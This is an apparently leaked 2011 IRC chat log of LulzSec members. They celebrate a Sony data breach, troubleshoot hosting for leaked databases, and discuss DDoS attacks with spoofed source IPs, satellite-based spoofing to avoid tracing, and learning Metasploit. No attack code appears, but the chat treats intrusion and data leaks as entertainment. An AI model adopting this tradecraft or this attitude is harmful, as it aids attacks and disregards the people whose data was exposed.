<storm> OK Jun 02 18:22:53 <storm> good game. Jun 02 18:22:55 <Sabu> muah Jun 02 18:23:03 <storm> I gotta go to that thing we talk about from time to time Jun 02 18:23:04 <storm> ;) Jun 02 18:23:07 <storm> I'll be back Jun 02 18:23:10 <joepie91> fap? Jun 02 18:23:14 <storm> text me if shit gets knocked you feel me? Jun 02 18:23:15 <storm> na Jun 02 18:23:15 <trollpoll> sure fap Jun 02 18:23:15 <joepie91> :P Jun 02 18:23:25 <storm> btw Jun 02 18:23:31 <storm> people are dropping the ipv6 server Jun 02 18:23:31 <joepie91> fap. always fap. Jun 02 18:23:37 <storm> they want us to be opless. Jun 02 18:23:45 <joepie91> friend of mine just dropped too Jun 02 18:23:52 <trollpoll> perhaps is not a bad idea to leave 2600 ... Jun 02 18:23:58 <storm> perhaps Jun 02 18:24:00 <Recursion> as I said Jun 02 18:24:00 <Topiary> yeah let's chill somewhere else Jun 02 18:24:01 <storm> because for one

Jun 02 18:24:03 <Topiary> everyone wanna leave? Jun 02 18:24:04 <joepie91> strangely I dont ping out yet Jun 02 18:24:06 <trollpoll> feds will start searching ips of random users Jun 02 18:24:08 <storm> I'm not going to drop a ton of users Jun 02 18:24:09 <Recursion> dont interface with the public more than you nee d to Jun 02 18:24:17 <storm> to priotect a shit channel on shitty servers Jun 02 18:24:20 <storm> protect even Jun 02 18:24:21 <storm> although Jun 02 18:24:22 <Sabu> look Jun 02 18:24:26 <storm> having a fanbase is fun Jun 02 18:24:30 <Sabu> close channel Jun 02 18:24:33 <Sabu> first Jun 02 18:24:36 <Sabu> mod channel Jun 02 18:24:37 <Sabu> +m Jun 02 18:24:49 <storm> done Jun 02 18:24:50 <Sabu> let everyone know 2600 irc was temporary for meeting fan s or whatever Jun 02 18:24:51 <storm> now what? Jun 02 18:24:52 <Sabu> see us on twitter Jun 02 18:24:58 <Sabu> and just close the chan down Jun 02 18:25:04 <Sabu> throw a crackhead bot in there and keep it moving Jun 02 18:25:08 <Neuron> rgr Jun 02 18:25:14 <Sabu> neuron let storm do it Jun 02 18:25:16 <Recursion> Neuron: did you start an AMA? Jun 02 18:25:16 <joepie91> I think a server just died Jun 02 18:25:41 <Topiary> now we all leave Jun 02 18:25:43 <Topiary> everyone /part Jun 02 18:25:51 <Sabu> yeah Jun 02 18:25:53 <trollpoll> thats it Jun 02 18:25:57 <Sabu> no more public apperances Jun 02 18:26:00 <Sabu> witohut us organizing it Jun 02 18:26:03 <Neuron> left Jun 02 18:26:05 <Sabu> thanks storm for holding it down Jun 02 18:26:05 <trollpoll> great Jun 02 18:26:13 <Sabu> guys from now on Jun 02 18:26:22 <storm> done Jun 02 18:26:23 <Sabu> if you are not familiar with these hostile environments Jun 02 18:26:25 <Neuron> Few seocnds Jun 02 18:26:35 <Sabu> don't partake in it Jun 02 18:26:38 <storm> SignOff hentrax: #lulzsec (Ping timeout: 240 sec Jun 02 18:26:38 <storm> SignOff home_keys: #lulzsec (Quit: Leaving) Jun 02 18:26:38 <storm> SignOff haraldo: #lulzsec (Quit: Leaving.) Jun 02 18:26:38 <storm> fancypants is now known as lessthanthree Jun 02 18:26:38 <storm> happyhour [~hehe@124-148-131-129.dyn.iinet.net.a Jun 02 18:26:38 <storm> SignOff Anonique88: #lulzsec () Jun 02 18:26:38 <storm> BlizWar [~kruppa@a88-112-133-232.elisa-laajakais Jun 02 18:26:38 <storm> [] Jun 02 18:26:38 <storm> SignOff SL1CHAOS: #lulzsec () Jun 02 18:26:38 <storm> SignOff [KGB]Derungo: #lulzsec () Jun 02 18:26:39 <storm> rofl Jun 02 18:26:44 <storm> right after topic change Jun 02 18:26:55 <Neuron> bwhaha Jun 02 18:26:58 <storm> and yeah guys Jun 02 18:26:59 <storm> btw Jun 02 18:27:03 <Sabu> yeah bro? Jun 02 18:27:04 <joepie91> [02:26:51] -=- nyannyan is now known as WANT2CHAT Jun 02 18:27:04 <joepie91> [02:26:53] -=- BUT_WANT_TO_TRO is no w known as WANT_TO_TROLL

Jun 02 18:27:06 <storm> don't freak out over some packets Jun 02 18:27:08 <storm> you're all fine Jun 02 18:27:13 <Sabu> yes Jun 02 18:27:14 <storm> that guy barely had 100mbps Jun 02 18:27:19 <Neuron> haha yeah i wasn't worried :P Jun 02 18:27:20 <joepie91> lol Jun 02 18:27:30 <joepie91> btw Jun 02 18:27:31 <storm> i logged the ddos on my server in the .nl Jun 02 18:27:32 <joepie91> madjack died Jun 02 18:27:33 <joepie91> :P Jun 02 18:27:46 <Recursion> I was a magicjack. Jun 02 18:27:46 <joepie91> so inb4 massive ping timeout/split Jun 02 18:28:10 <storm> whos bottle_of_rum Jun 02 18:28:18 <trollpoll> lol? Jun 02 18:28:20 <storm> he/she tried to evade my +mode Jun 02 18:29:20 <joepie91> storm Jun 02 18:29:23 <joepie91> that is not very usefuk Jun 02 18:29:27 <joepie91> useful* Jun 02 18:29:35 <joepie91> on a server where your host can be an unmasked i p Jun 02 18:29:36 <joepie91> lol Jun 02 18:29:36 <storm> what? Jun 02 18:29:38 <storm> ./fuckem Jun 02 18:29:39 <storm> ? Jun 02 18:29:44 <joepie91> you banned a-z Jun 02 18:29:45 <joepie91> in hostname Jun 02 18:29:50 <storm> i did a bitchx command Jun 02 18:29:52 <storm> called fuckem Jun 02 18:29:53 <joepie91> if your host can be 1.2.3.4 that's not very usef ul Jun 02 18:29:55 <joepie91> ah Jun 02 18:29:56 <joepie91> fix it then Jun 02 18:29:56 <joepie91> lol Jun 02 18:29:58 <storm> its not for looks its for lulz Jun 02 18:30:04 <storm> this server is no more Jun 02 18:30:06 <storm> relax. Jun 02 18:30:13 <joepie91> you didnt ban everyone though Jun 02 18:30:14 <joepie91> :P Jun 02 18:30:15 <storm> let me do my thing plox Jun 02 18:30:21 <storm> I didn't ban anyone Jun 02 18:30:28 <joepie91> lololololol Jun 02 18:30:29 <joepie91> split Jun 02 18:30:33 <storm> ye./ Jun 02 18:30:35 <storm> ye.* Jun 02 18:30:38 <storm> afk Jun 02 18:31:25 * pwnsauce (pwnsauce@HA-ntp.a04.d005o9.IP) has left #pureelite Jun 02 18:32:29 <Neuron> Sabu: Jun 02 18:32:39 <storm> txt me your number sabuzi Jun 02 18:32:41 <storm> i lost it Jun 02 18:32:47 <storm> bbl @g@in Jun 02 18:38:21 <Neuron> 0-0\ Jun 02 18:38:23 <Neuron> that was fun Jun 02 18:41:30 <trollpoll> ey guys, this is not a funeral xD Jun 02 19:03:22 * Sabu has quit (Ping timeout: 121 seconds) Jun 02 19:05:42 <Neuron> p.s i didnt make a IAMA on reddit was a misunder standing Jun 02 19:08:29 <trollpoll> well, i dont think this is a problem bigger than having a twitter account, or a webpage, but is important to know what to do wit h it

Jun 02 19:08:47 <Neuron> aye Jun 02 19:08:51 <Neuron> were good Jun 02 19:11:36 * Palladium has quit (Quit: Lost terminal) Jun 02 19:12:02 <Recursion> I always wondered why lulzsec is hosted on same server as these sites: Jun 02 19:12:02 <Recursion> Found 4 domains hosted on the same web server as sale4gucci.com (111.90.139.155). Jun 02 19:12:02 <Recursion> lulzsecurity.com Jun 02 19:12:02 <Recursion> sale4gucci.com Jun 02 19:12:02 <Recursion> www.louisvuitton4bag.com Jun 02 19:12:57 <Neuron> lol Jun 02 19:13:57 <Neuron> bbiab Jun 02 19:18:00 * Neuron has quit (Ping timeout: 121 seconds) Jun 02 19:18:10 * Sabu (sabu@HA-v86.0ft.1icbev.IP) has joined #pure-elite Jun 02 19:18:19 * Sabu has quit (Connection closed) Jun 02 19:19:13 * Sabu (sabu@HA-06g.14k.jdcvo3.IP) has joined #pure-elite Jun 02 19:22:39 <Recursion> www.sale4gucci.com Jun 02 19:22:43 * Topiary has quit (Ping timeout: 121 seconds) Jun 02 19:22:43 <Recursion> also that Jun 02 19:23:17 <Recursion> Sabu: Jun 02 19:23:18 <Recursion> 16:12:06 <@Recursion> I always wondered why lulz sec is hosted on same server as these sites: Jun 02 19:23:18 <Recursion> 16:12:06 <@Recursion> Found 4 domains hosted on the same web server as sale4gucci.com (111.90.139.155). Jun 02 19:23:18 <Recursion> 16:12:06 <@Recursion> lulzsecurity.com Jun 02 19:23:18 <Recursion> 16:12:06 <@Recursion> sale4gucci.com Jun 02 19:23:18 <Recursion> 16:12:06 <@Recursion> www.louisvuitton4bag.com Jun 02 19:26:04 <trollpoll> this means that the host desnt ask about the web activity xDDD Jun 02 19:27:40 <trollpoll> night Jun 02 19:27:44 * trollpoll has quit (Quit: Leaving) Jun 02 19:30:15 <Sabu> it hs nothing to do with us Jun 02 19:30:28 <Recursion> just saying brother Jun 02 19:59:55 * lol gives channel operator status to Sabu Jun 02 20:22:33 * Disconnected (Invalid argument). **** ENDING LOGGING AT Thu Jun 2 20:22:33 2011 **** BEGIN LOGGING AT Fri Jun 3 13:15:48 2011 Jun Jun ing Jun .IP Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun 03 13:15:48 * Now talking on #pure-elite 03 13:15:48 * Topic for #pure-elite is: pE Today we're having a meet - stick around 03 13:15:48 * Topic for #pure-elite set by Sabu!sabu@HA-06g.14k.jdcvo3 at Fri Jun 3 09:41:46 2011 03 13:17:46 <Sabu> jeaaa 03 13:18:01 <[redacted]> chyeaaaa 03 13:18:17 <[redacted]> so tell me about the new sony hack 03 13:18:20 <[redacted]> and all the lulz i missed 03 13:18:33 <Sabu> we just dorpped what we had 03 13:18:37 <[redacted]> oh 03 13:18:41 <Sabu> everyone went crazy for it 03 13:18:42 <Sabu> rofl 03 13:18:44 <[redacted]> you mean with the coupons? 03 13:18:57 <[redacted]> was it from that SQLi 03 13:21:57 <Sabu> yeah 03 13:22:23 <lol> and @lulzsec now has more than 34,000 folowers xD 03 13:23:07 <Sabu> niceee 03 13:25:14 <joepie91> somehow 03 13:25:18 <joepie91> when you have to do something in a hurry 03 13:25:21 <joepie91> everything goes wrong

Jun 03 13:25:26 <joepie91> ._. Jun 03 13:27:45 <Sabu> yeah Jun 03 13:28:07 <joepie91> internet goes derp Jun 03 13:28:18 <joepie91> filezilla raeps the master table or w/e it's cal led Jun 03 13:28:27 <joepie91> notepad starts lagging my cpu for some reason Jun 03 13:28:28 <joepie91> >.> Jun 03 13:42:06 <tflow> LOL Jun 03 13:42:07 <tflow> LOL Jun 03 13:42:07 <tflow> LOL Jun 03 13:42:14 <tflow> cloudflare = fucked up hardcore Jun 03 13:42:14 <joepie91> ? Jun 03 13:42:16 <tflow> http://www.searchdiscovered.com/?dn=INSERT%20INTO%20%60s ubdomains%60%20%28%60subdomain_name%60%29%20VALUES&pid=5POXE2HY6 Jun 03 13:42:22 <joepie91> that's not cloudflare Jun 03 13:42:22 <tflow> >INSERT INTO `subdomains` (`subdomain_name`) Jun 03 13:42:23 <joepie91> that is byethost Jun 03 13:42:24 <joepie91> lol Jun 03 13:42:25 <tflow> i know Jun 03 13:42:31 <tflow> wel Jun 03 13:42:32 <tflow> yeah Jun 03 13:42:33 <tflow> it could be Jun 03 13:42:37 <joepie91> it is :P Jun 03 13:42:42 <tflow> but when you go to the site it redirects to that Jun 03 13:42:45 <joepie91> ye Jun 03 13:42:51 <joepie91> because byethost could not find the file at firs t Jun 03 13:42:53 <joepie91> thus redirected there Jun 03 13:42:55 <joepie91> as "error page" Jun 03 13:43:05 <joepie91> and cloudflare cached the redirect Jun 03 13:43:14 <joepie91> but if you check the IP that shit is hosted on Jun 03 13:43:21 <joepie91> you'll see it's byethost, not cf :) Jun 03 13:43:29 <joepie91> byethost has like 61234612346 domains Jun 03 13:45:41 <joepie91> 2011-06-03 19:45:12 Connecting lulzsecurity.com: 80 Jun 03 13:45:41 <joepie91> 2011-06-03 19:45:12 Connected Jun 03 13:45:41 <joepie91> 2011-06-03 19:45:12 GET /releases/x_factor_conte stants_database.sql HTTP/1.0 Jun 03 13:45:41 <joepie91> 2011-06-03 19:45:12 Host: lulzsecurity.com Jun 03 13:45:41 <joepie91> 2011-06-03 19:45:12 Cookie: __cfduid=db7dd1e6b9d 039ee2820200b883a7ee291307121478 Jun 03 13:45:41 <joepie91> 2011-06-03 19:45:12 User-Agent: Mozilla/4.0 (com patible; MSIE 6.0; Windows NT 5.0) Jun 03 13:45:41 <joepie91> 2011-06-03 19:45:12 Accept: */* Jun 03 13:45:41 <joepie91> 2011-06-03 19:45:12 Pragma: no-cache Jun 03 13:45:41 <joepie91> 2011-06-03 19:45:12 Cache-Control: no-cache Jun 03 13:45:41 <joepie91> 2011-06-03 19:45:12 Connection: close Jun 03 13:45:42 <joepie91> 2011-06-03 19:45:14 HTTP/1.1 404 Not Found Jun 03 13:45:43 <joepie91> 2011-06-03 19:45:14 Server: cloudflare-nginx Jun 03 13:45:44 <joepie91> 2011-06-03 19:45:14 Date: Fri, 03 Jun 2011 17:45 :11 GMT Jun 03 13:45:45 <joepie91> 2011-06-03 19:45:14 Content-Type: text/html Jun 03 13:45:46 <joepie91> 2011-06-03 19:45:14 Connection: close Jun 03 13:45:47 <joepie91> 2011-06-03 19:45:14 Accept-Ranges: bytes Jun 03 13:45:48 <joepie91> 2011-06-03 19:45:14 Vary: User-Agent Jun 03 13:45:49 <joepie91> 2011-06-03 19:45:14 Cache-Control: public, proxy -revalidate Jun 03 13:45:50 <joepie91> 2011-06-03 19:45:14 X-Cache: MISS from demil1.by etcluster.com Jun 03 13:45:51 <joepie91> 2011-06-03 19:45:14 Via: 1.1 demil1.byetcluster.

com:80 (Lusca/LUSCA_HEAD-r14756) Jun 03 13:45:52 <joepie91> ;_; Jun 03 13:46:21 <joepie91> byet gives a 404 Jun 03 13:46:34 * joepie91 calmly waits for files to propagate Jun 03 13:48:22 <joepie91> Webspace:5632 MB Jun 03 13:48:23 <joepie91> Disk space used0 MB Jun 03 13:48:23 <joepie91> Disk Free 5632 MB Jun 03 13:48:23 <joepie91> what Jun 03 13:48:33 <joepie91> >disk space used 0 Jun 03 13:49:17 <joepie91> Bandwidth:204800 MB Jun 03 13:49:17 <joepie91> Bandwidth used:481 MB Jun 03 13:49:17 <joepie91> Bandwidth remaining:204319 MB Jun 03 13:49:19 <joepie91> riight Jun 03 14:06:24 <joepie91> mk Jun 03 14:06:28 <joepie91> all sony links are working on this node Jun 03 14:06:30 <joepie91> the rest is still broken Jun 03 14:08:01 <tflow> byethost is crewing up Jun 03 14:08:10 <tflow> one minute it works, next minute is redirects to portal Jun 03 14:08:33 <tflow> too many mood swings Jun 03 14:08:58 <joepie91> tflow Jun 03 14:09:08 <joepie91> as far as I know Cloudflare has a different cach e for every node Jun 03 14:09:08 * virtual (virtual@HA-dfm.tk3.kjaj4b.IP) has joined #pureelite Jun 03 14:09:23 <virtual> hi Jun 03 14:09:23 <joepie91> that was why some people got errors when anonnew s went down, while others could view an offline version Jun 03 14:09:28 <virtual> douh... Jun 03 14:09:31 * virtual is now known as trollpoll Jun 03 14:09:39 <joepie91> thus, some nodes will have the redirect cached Jun 03 14:09:44 <joepie91> while others have the actual files already Jun 03 14:09:48 <joepie91> that is why I asked you to purge cache Jun 03 14:09:55 <joepie91> so that all nodes will be forced to update their cache Jun 03 14:10:08 * tflow has quit (A TLS packet with unexpected length was received.) Jun 03 14:10:10 <joepie91> . Jun 03 14:10:34 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elit e Jun 03 14:10:37 <joepie91> wb Jun 03 14:10:43 <joepie91> paste incoming Jun 03 14:10:45 <joepie91> <joepie91>tflow Jun 03 14:10:45 <joepie91> <joepie91>as far as I know Cloudflare has a diff erent cache for every node Jun 03 14:10:45 <joepie91> <joepie91>that was why some people got errors wh en anonnews went down, while others could view an offline version Jun 03 14:10:45 <joepie91> <joepie91>thus, some nodes will have the redirec t cached Jun 03 14:10:45 <joepie91> <joepie91>while others have the actual files alr eady Jun 03 14:10:45 <joepie91> <joepie91>that is why I asked you to purge cache Jun 03 14:10:45 <joepie91> <joepie91>so that all nodes will be forced to up date their cache Jun 03 14:10:50 <tflow> ye, saw Jun 03 14:10:53 <tflow> hey trollpoll Jun 03 14:11:01 <trollpoll> eyyy tflow ! Jun 03 14:11:08 <joepie91> but ye, a purge cache should solve everything Jun 03 14:11:29 <tflow> the problem isn't @ cloudflare Jun 03 14:11:32 <tflow> it's @ bytehost Jun 03 14:11:35 <tflow> i tried with tamper data

Jun 03 14:11:39 <trollpoll> i saw the opiran leak Jun 03 14:11:40 <joepie91> it isn't... Jun 03 14:11:40 <tflow> it redirected to the portal page Jun 03 14:11:44 <joepie91> you cannot force a reload Jun 03 14:11:46 <tflow> even with the lulzsec domain Jun 03 14:11:51 <tflow> trust me Jun 03 14:11:52 <tflow> it is Jun 03 14:11:54 <joepie91> .. Jun 03 14:11:55 <trollpoll> the emails came to us from an anonymous source? Jun 03 14:12:01 <tflow> if you connect directly to byethost Jun 03 14:12:07 <Sabu> crazy trolllpoll Jun 03 14:12:10 <tflow> then you'll get the portal Jun 03 14:12:10 <joepie91> how are you directly connecting to byethost Jun 03 14:12:16 <trollpoll> i hope not... Jun 03 14:12:19 <joepie91> ohfuck Jun 03 14:12:21 <joepie91> .. Jun 03 14:12:22 <tflow> typing in the ip + modifying host header Jun 03 14:12:27 <joepie91> eh Jun 03 14:12:33 <joepie91> I am not sure how the byethost dns works.. Jun 03 14:12:36 <joepie91> er Jun 03 14:12:37 <joepie91> network* Jun 03 14:12:42 <joepie91> they have server clusters Jun 03 14:12:45 <joepie91> so that may be an issue Jun 03 14:12:52 <tflow> true Jun 03 14:12:54 <joepie91> that you are sending a request to a server that is not supposed to handle the request Jun 03 14:13:02 <joepie91> can you add multiple A records in cloudflare? Jun 03 14:13:13 <tflow> i think so Jun 03 14:13:16 <tflow> why? Jun 03 14:13:22 <tflow> also Jun 03 14:13:34 <tflow> ns1.byet.org resolves lulzsec to a different i Jun 03 14:13:35 <tflow> ip Jun 03 14:13:40 <tflow> ns1-5 Jun 03 14:13:45 <tflow> which do not work at all Jun 03 14:13:53 <tflow> so i'm simply using the ip of byethost14.com Jun 03 14:14:03 <tflow> even though that's not the listen ip for lulzsec in thei r nameservers Jun 03 14:14:04 <joepie91> mm Jun 03 14:14:05 <joepie91> 1 sec Jun 03 14:14:25 <tflow> listed* Jun 03 14:18:10 <joepie91> tflow Jun 03 14:18:13 <joepie91> point it to 209.51.196.244 Jun 03 14:18:24 <joepie91> I modified my hosts file Jun 03 14:18:28 <joepie91> and if I set it to that Jun 03 14:18:29 <joepie91> it works Jun 03 14:18:33 <tflow> are you sure Jun 03 14:18:39 <tflow> let me try Jun 03 14:19:57 <tflow> doesn't work here Jun 03 14:20:24 <joepie91> WTF. Jun 03 14:20:30 <joepie91> byethost.com Jun 03 14:20:30 <joepie91> This account is currently suspended. Jun 03 14:20:30 <joepie91> It appears that this account's free hosting quot a has been fully used! We would highly recommend upgrading your account here : S ecuresignup.net , then create a ticket at http://byet.org/premiumsupport request ing the free hosting account to be migrated to the new paid account. Jun 03 14:20:45 <tflow> .. Jun 03 14:20:47 <tflow> where's that? Jun 03 14:20:53 <joepie91> on login Jun 03 14:20:53 <joepie91> idk Jun 03 14:20:57 <joepie91> k sec

Jun 03 14:21:10 <tflow> what quota .__. Jun 03 14:21:24 <joepie91> I have no clue Jun 03 14:21:29 <joepie91> http://zymic.com/ Jun 03 14:21:33 <joepie91> sign up there Jun 03 14:21:37 <joepie91> it's what opmetalgear uses as well Jun 03 14:21:41 * joepie91 sighs Jun 03 14:21:55 <joepie91> it's probably best to let byethost rest for now Jun 03 14:22:01 <joepie91> or it'll become hours of troubleshooting Jun 03 14:24:30 <tflow> ugh Jun 03 14:24:33 <tflow> don't worry Jun 03 14:24:39 <tflow> i have somewhere to host it now Jun 03 14:24:43 <joepie91> ah Jun 03 14:24:51 * joepie91 shoots Murphy Jun 03 14:33:43 <joepie91> these people... Jun 03 14:33:44 <joepie91> @chuckuf Jun 03 14:33:45 <joepie91> Charles Farley Jun 03 14:33:45 <joepie91> trying to get to lulzsecurity.com via various To r exit nodes appear to be blocked by the host due to being a 'spam bot'. Jun 03 14:33:48 <joepie91> honestly Jun 03 14:33:52 <joepie91> if you are "blocked" Jun 03 14:34:00 <joepie91> you pretty much get a "fill in captcha to contin ue" Jun 03 14:34:01 <joepie91> in your face Jun 03 14:34:10 <joepie91> how can you even have the misconception that you are completely blocked : Jun 03 14:35:43 <joepie91> LOL Jun 03 14:35:44 <joepie91> http://twitter.com/#!/tpb Jun 03 14:35:52 <joepie91> @tpb Jun 03 14:35:52 <joepie91> The Pirate Bay Jun 03 14:35:52 <joepie91> Sony Hacked Again, Account Data Posted to the Pi rate Bay: LulzSec, aka the Lulz Boat, compromised the personal d... http://bit.l y/mn3Q3x Jun 03 14:36:02 <joepie91> moaaarrrr publicity Jun 03 14:36:45 <Sabu> oh boyy Jun 03 14:38:57 <trollpoll> twitter account of lulzsec has more than 35.000 followers O_O... craziness... Jun 03 14:39:48 <trollpoll> is close to pass @sony :) Jun 03 14:40:02 <joepie91> @pytey Jun 03 14:40:02 <joepie91> pytey Jun 03 14:40:02 <joepie91> If I wasn't married I'd like to have @LulzSec as my girlfriend. Jun 03 14:45:24 <joepie91> LOL Jun 03 14:45:25 <joepie91> Sabu Jun 03 14:45:27 <joepie91> @Jake_W Jun 03 14:45:27 <joepie91> Jake Walker Jun 03 14:45:27 <joepie91> I wonder if @Sony's ever tried Microsoft Securit y Essentials? It's free and probably an upgrade over their current security meas ures. Jun 03 14:45:36 <Sabu> ROFL Jun 03 14:45:43 <Sabu> absurd hahhaha Jun 03 14:45:46 <joepie91> retweet that lol Jun 03 14:45:59 <Sabu> tell topiary Jun 03 14:46:03 <joepie91> Topiary DING Jun 03 14:46:09 <Topiary> ? Jun 03 14:46:13 <joepie91> retweet that Jun 03 14:46:17 <joepie91> http://twitter.com/#!/Jake_W/status/767181928520 90880 Jun 03 14:46:19 <Topiary> k Jun 03 14:46:22 <joepie91> :P Jun 03 14:46:48 <storm> hi

Jun 03 14:47:37 <lol> omg <3 this Jun 03 14:47:37 <lol> http://techliberation.com/wp-content/uploads/2011/06/pop tartFINALTINY.gif Jun 03 14:48:26 * joepie91 save Jun 03 14:52:34 <storm> i just woke up again Jun 03 14:52:37 <storm> >:x Jun 03 14:52:40 <joepie91> morning xD Jun 03 14:52:45 <storm> thanks Jun 03 14:54:42 <trollpoll> lulzsec.... the reign where the sun never set... Jun 03 14:56:51 <joepie91> jesus christ Jun 03 14:56:54 <joepie91> all bitcoin sites are slow Jun 03 14:56:54 <joepie91> atm Jun 03 15:01:45 <storm> -:- Channel #lulzsec was created at Fri Jun 3 02:59:10 2011 Jun 03 15:01:45 <storm> -:- BitchX: Join to #lulzsec was synched in 0.204 secs!! Jun 03 15:01:45 <storm> -:- r0d3nt No such server Jun 03 15:01:45 <storm> -:- BitchX: Generating irc server map Jun 03 15:01:45 <storm> -:- madjack.2600.net [0] Jun 03 15:01:54 <storm> lmfao Jun 03 15:02:05 <storm> -:- Topic (#2600): 2600 Get your faux on Jun 03 15:02:05 <storm> -:- Topic (#2600): set by jax!~jax@184.107.140.210 at Th u Jun 2 23:34:40 2011 Jun 03 15:02:05 <storm> -:- [Users(#2600:11)] Jun 03 15:02:05 <storm> [ hatred ] [ _kb ] [vpsypete ] [vAngryNerdA] [vschrodinge] Jun 03 15:02:05 <storm> [vmaxim ] [vkutio ] [vdizopsin ] [vElectRo` ] [vz0t ] Jun 03 15:02:05 <storm> [vbinary_ ] Jun 03 15:02:17 <storm> sorry guis Jun 03 15:02:21 <storm> did i sink your ship? Jun 03 15:03:12 <lol> lol Jun 03 15:03:24 <storm> hey kayla Jun 03 15:03:50 * storm hits ism electronic cigarette Jun 03 15:03:55 <storm> his even Jun 03 15:03:56 <storm> :D Jun 03 15:04:39 <trollpoll> @2600 The next "reporter" who calls us asking to speak to someone from @LulzSec is going to lose their phone privileges. We're s erial Jun 03 15:04:42 <lol> hihihihihihhi \:D/ Jun 03 15:04:43 <trollpoll> hilarious xDDD Jun 03 15:05:11 <storm> troll Jun 03 15:05:16 <storm> i posted that last night Jun 03 15:05:18 <storm> it is lulz Jun 03 15:05:32 <storm> \o/ Jun 03 15:05:41 <storm> HACK US AND WE WILL BOMB YOU. - Obama Jun 03 15:05:48 <trollpoll> didnt see :P nice lulz ye Jun 03 15:05:54 <trollpoll> yes, this is not so lulz... :P Jun 03 15:06:03 <storm> lol Jun 03 15:06:05 <trollpoll> and the NATO doc too... Jun 03 15:06:12 <storm> i didnt see it Jun 03 15:06:28 <trollpoll> NATO document talking about anonymous Jun 03 15:06:29 * storm gives channel operator status to Topiary Jun 03 15:06:35 <storm> oh Jun 03 15:06:36 <trollpoll> that must be prosecuted Jun 03 15:06:43 <storm> yeah i saw that Jun 03 15:06:58 <trollpoll> one of these days we will have tanks on our home s... Jun 03 15:07:19 <storm> yeah no shit Jun 03 15:07:28 <trollpoll> http://www.nato-pa.int/default.asp?SHORTCUT=2443 Jun 03 15:07:28 <storm> scary stuff

Jun 03 15:07:31 <trollpoll> this is the report... Jun 03 15:07:45 <trollpoll> that =XXXX make me tent.... Jun 03 15:08:19 <storm> i need to somehow get more spoofing boxes Jun 03 15:08:27 <storm> i have a few networks listed that allow it Jun 03 15:09:09 <trollpoll> i now a "complicated" technology to spoof and ma ke totally imposible to track Jun 03 15:09:23 <trollpoll> is satellite based... Jun 03 15:09:36 <trollpoll> did you heard about? Jun 03 15:09:41 <storm> well Jun 03 15:09:49 <storm> i dont know of anything untrackable Jun 03 15:09:50 <trollpoll> ill try to found a doc about it Jun 03 15:09:58 <storm> even my spoofed attacks are trackable Jun 03 15:10:02 <storm> if you have backbone access Jun 03 15:10:10 <storm> only if Jun 03 15:10:13 <trollpoll> yes, with a satellite the unique trackable will be that you are in europe Jun 03 15:10:18 <trollpoll> or in usa xD Jun 03 15:10:26 <storm> heh Jun 03 15:10:27 <trollpoll> because the satellite sends the signal to everyb ody Jun 03 15:10:32 <trollpoll> so many ppl can hear Jun 03 15:10:51 <trollpoll> the only way to track is in the "send" signal Jun 03 15:11:15 <trollpoll> but not in the receive, so, if you spoof your ip address to an ip address that you know that is used by satellite Jun 03 15:11:33 <trollpoll> you can send for one way and receive for another Jun 03 15:11:52 <trollpoll> you just need an isp that permit spoofing Jun 03 15:11:52 <storm> i usually just use random ip spoofing Jun 03 15:12:07 <storm> which is flag 0 for my program Jun 03 15:12:22 <storm> meaning it sends numerous source ips Jun 03 15:12:28 <storm> more than 400 id say Jun 03 15:12:47 <joepie91> botflood in #lulzsec Jun 03 15:12:51 <trollpoll> cool Jun 03 15:13:20 <storm> on 2600? Jun 03 15:13:41 <storm> nvm Jun 03 15:14:08 <Recursion> MAN Jun 03 15:14:15 <Recursion> -caps Jun 03 15:14:36 <Recursion> map, I have more karma on my throwaway account t han I do on my regular reddit account Jun 03 15:14:40 <Recursion> man* Jun 03 15:15:32 <joepie91> lol Jun 03 15:16:35 <trollpoll> btw the 90% of the satellite traffic is plain te xt... Jun 03 15:16:50 <trollpoll> and is it possible to sniff whatever you want... Jun 03 15:16:59 <trollpoll> scada traffic ... Jun 03 15:17:20 <tflow> http://lulzsecurity.com/ sailing smoothly again Jun 03 15:19:02 <Topiary> you think it'll hold captain? Jun 03 15:19:13 <tflow> yes Jun 03 15:19:58 <tflow> for sure Jun 03 15:21:13 <storm> doesnt look smooth to me tflow Jun 03 15:21:20 <tflow> howso Jun 03 15:22:47 <trollpoll> anyway, if you want to know more about it... htt p://www.blackhat.com/presentations/bh-dc-10/Nve_Leonardo/BlackHat-DC-2010-Nve-Pl aying-with-SAT-1.2-wp.pdf Jun 03 15:23:29 <Sabu> yes Jun 03 15:23:32 <Sabu> we need to look at Jun 03 15:23:51 <storm> Sabu :D Jun 03 15:23:56 <Sabu> yes brother Jun 03 15:24:00 <storm> howyu be Jun 03 15:24:23 <storm> im learning nmap >;x Jun 03 15:24:24 <storm> er

Jun 03 15:24:26 <storm> nmap? Jun 03 15:24:26 <storm> no Jun 03 15:24:30 <storm> msf3 Jun 03 15:24:51 <storm> METASPLOIT NINJA'IN Jun 03 15:25:02 <Sabu> word up Jun 03 15:27:41 <joepie91> if you want to know what laws you are breaking Jun 03 15:27:42 <joepie91> http://mpictcenter.blogspot.com/2011/06/legal-is sues-in-pbs-hack.html Jun 03 15:27:48 <joepie91> :P Jun 03 15:28:00 <Sabu> sweet Jun 03 15:28:02 <joepie91> aaaand gone was anonworld Jun 03 15:28:05 <joepie91> >.< Jun 03 15:28:08 <trollpoll> "LulzSec, a splinter group of Anomous," Jun 03 15:28:11 <trollpoll> bad starting... Jun 03 15:28:12 <joepie91> lolya Jun 03 15:28:17 <joepie91> the rest is a copypaste Jun 03 15:28:22 <joepie91> from a legalfag email Jun 03 15:31:01 <storm> LULzsec Jun 03 15:31:03 <storm> lmao Jun 03 15:32:40 <lol> lulzsex Jun 03 15:32:55 <lol> lulzseckz Jun 03 15:35:08 <storm> lol Jun 03 15:42:43 <joepie91> there are so many spinoffs on twitter Jun 03 15:42:45 <joepie91> and parodies Jun 03 15:42:46 <joepie91> and fans Jun 03 15:42:47 <joepie91> etc Jun 03 15:44:01 <tflow> it's a meme :o Jun 03 15:44:16 <tflow> server# netstat -n wc -l Jun 03 15:44:16 <tflow> 394 Jun 03 15:44:21 <tflow> site is handling a fuckton of visitors Jun 03 15:44:27 <tflow> all those are legitimate connections btw Jun 03 15:44:42 <joepie91> lol Jun 03 15:44:47 <joepie91> do you have an access log? Jun 03 15:45:38 <joepie91> also, why does the site not have the bitcoin add ress on it Jun 03 15:45:39 <joepie91> : Jun 03 15:46:26 <tflow> yeah i have an access log Jun 03 15:46:32 <tflow> i'll add bitcoin address soon Jun 03 15:46:38 <tflow> too busy with #fuckfbifriday atm Jun 03 15:46:54 <storm> 